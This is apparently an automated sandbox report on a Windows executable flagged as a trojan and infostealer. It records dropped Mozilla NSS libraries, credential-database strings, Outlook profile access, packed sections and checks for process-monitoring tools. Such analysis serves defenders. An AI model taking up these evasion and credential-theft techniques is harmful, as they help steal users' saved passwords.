Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CB3B910

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB	0_2_00E690CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836	0_2_00E7A836
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E63156	0_2_00E63156
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8495C	0_2_00E8495C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7F936	0_2_00E7F936
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E772A1	0_2_00E772A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D73A4F	0_2_00D73A4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8B23F	0_2_00E8B23F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8632C	0_2_00E8632C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7C482	0_2_00E7C482
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D67479	0_2_00D67479
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8142A	0_2_00E8142A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2F430	0_2_00D2F430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D915DB	0_2_00D915DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1BDAF	0_2_00E1BDAF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBED89	0_2_00DBED89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E58D69	0_2_00E58D69
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E78D7F	0_2_00E78D7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E87D5A	0_2_00E87D5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6653C	0_2_00D6653C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E76661	0_2_00E76661
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E897FB	0_2_00E897FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8B739	0_2_00D8B739
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD35A0	0_2_6CAD35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB334A0	0_2_6CB334A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3C4A0	0_2_6CB3C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE6C80	0_2_6CAE6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB16CF0	0_2_6CB16CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADD4E0	0_2_6CADD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE64C0	0_2_6CAE64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFD4D0	0_2_6CAFD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4542B	0_2_6CB4542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB15C10	0_2_6CB15C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB22C10	0_2_6CB22C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4AC00	0_2_6CB4AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4545C	0_2_6CB4545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE5440	0_2_6CAE5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB385F0	0_2_6CB385F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB10DD0	0_2_6CB10DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB00512	0_2_6CB00512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEFD00	0_2_6CAEFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFED10	0_2_6CAFED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB34EA0	0_2_6CB34EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3E680	0_2_6CB3E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF5E90	0_2_6CAF5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB476E3	0_2_6CB476E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADBEF0	0_2_6CADBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEFEF0	0_2_6CAEFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB39E30	0_2_6CB39E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB17E10	0_2_6CB17E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB25600	0_2_6CB25600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB46E63	0_2_6CB46E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADC670	0_2_6CADC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB13E50	0_2_6CB13E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF4640	0_2_6CAF4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB22E4E	0_2_6CB22E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF9E50	0_2_6CAF9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB277A0	0_2_6CB277A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB06FF0	0_2_6CB06FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADDFE0	0_2_6CADDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB17710	0_2_6CB17710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE9F00	0_2_6CAE9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB060A0	0_2_6CB060A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFC0E0	0_2_6CAFC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB158E0	0_2_6CB158E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB450C7	0_2_6CB450C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1B820	0_2_6CB1B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB24820	0_2_6CB24820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE7810	0_2_6CAE7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1F070	0_2_6CB1F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8850	0_2_6CAF8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFD850	0_2_6CAFD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0D9B0	0_2_6CB0D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADC9A0	0_2_6CADC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB15190	0_2_6CB15190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB32990	0_2_6CB32990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2B970	0_2_6CB2B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4B170	0_2_6CB4B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAED960	0_2_6CAED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFA940	0_2_6CAFA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB42AB0	0_2_6CB42AB0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00AB45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB194D0 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB0CBE8 appears 101 times

Source: file.exe, 00000000.00000002.2456918092.000000006CD55000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: nsafravy ZLIB complexity 0.9950154378742515

Source: file.exe, 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2151981046.0000000004B50000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB37030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CB37030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00AC8680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00AC3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\W55KL3FW.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2259640052.000000001D184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277252508.000000001D19F000.00000004.00000020.00020000.00000000.sdmp, EBFBKFBGIIIDGDGCFCGI.0.dr, DAAFBAKECAEGCBFIEGDG.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2456452408.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 44%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1866752 > 1048576

Source: file.exe

Static PE information: Raw size of nsafravy is bigger than: 0x100000 < 0x1a1800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2456822784.000000006CD0F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.ab0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsafravy:EW;asnnzaeh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsafravy:EW;asnnzaeh:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00AC9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d117a should be: 0x1c96e7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: nsafravy
Source: file.exe	Static PE information: section name: asnnzaeh
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB push 007D118Bh; mov dword ptr [esp], ebx	0_2_00E69111
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB push 0751C922h; mov dword ptr [esp], ecx	0_2_00E69124
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB push 06E29B7Ah; mov dword ptr [esp], ebx	0_2_00E69197
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB push ebp; mov dword ptr [esp], esi	0_2_00E691E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E690CB push eax; mov dword ptr [esp], edi	0_2_00E69254
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAB8D9 push 4E044507h; mov dword ptr [esp], esi	0_2_00EAB92B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAB8D9 push esi; mov dword ptr [esp], eax	0_2_00EAB956
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAB8D9 push ebx; mov dword ptr [esp], edi	0_2_00EAB999
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D8C0 push ebp; mov dword ptr [esp], ebx	0_2_00F4D9D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D8C0 push esi; mov dword ptr [esp], 777EFA95h	0_2_00F4DA79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F470CC push ecx; mov dword ptr [esp], edi	0_2_00F47159
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF189E push 6227ADC5h; mov dword ptr [esp], eax	0_2_00EF1839
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE407D push 060AC771h; mov dword ptr [esp], edi	0_2_00EE4085
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACB035 push ecx; ret	0_2_00ACB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF9876 push esi; mov dword ptr [esp], ebp	0_2_00EF98CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF9876 push ecx; mov dword ptr [esp], eax	0_2_00EF98F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF5047 push ebp; mov dword ptr [esp], edx	0_2_00EF5069
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C85A push 40DEA725h; mov dword ptr [esp], ebp	0_2_00F1C86E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C85A push 10DB37A1h; mov dword ptr [esp], esi	0_2_00F1C8A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5B835 push eax; mov dword ptr [esp], 59A5DB63h	0_2_00F5BE8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFA821 push edi; mov dword ptr [esp], eax	0_2_00EFA841
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F62839 push 0730A23Fh; mov dword ptr [esp], edx	0_2_00F62879
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push eax; mov dword ptr [esp], 7FF5C3AFh	0_2_00E7A8E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push edi; mov dword ptr [esp], 439F58AAh	0_2_00E7A8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push 062ACE16h; mov dword ptr [esp], edi	0_2_00E7A933
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push ebx; mov dword ptr [esp], edx	0_2_00E7A962
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push eax; mov dword ptr [esp], 7E42F682h	0_2_00E7A99B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push 4F95D997h; mov dword ptr [esp], edi	0_2_00E7A9F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push ecx; mov dword ptr [esp], eax	0_2_00E7AA60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push 33BCC030h; mov dword ptr [esp], edx	0_2_00E7AAA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A836 push 74E2E02Ah; mov dword ptr [esp], esi	0_2_00E7AAC7

Source: file.exe

Static PE information: section name: nsafravy entropy: 7.953733790704433

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
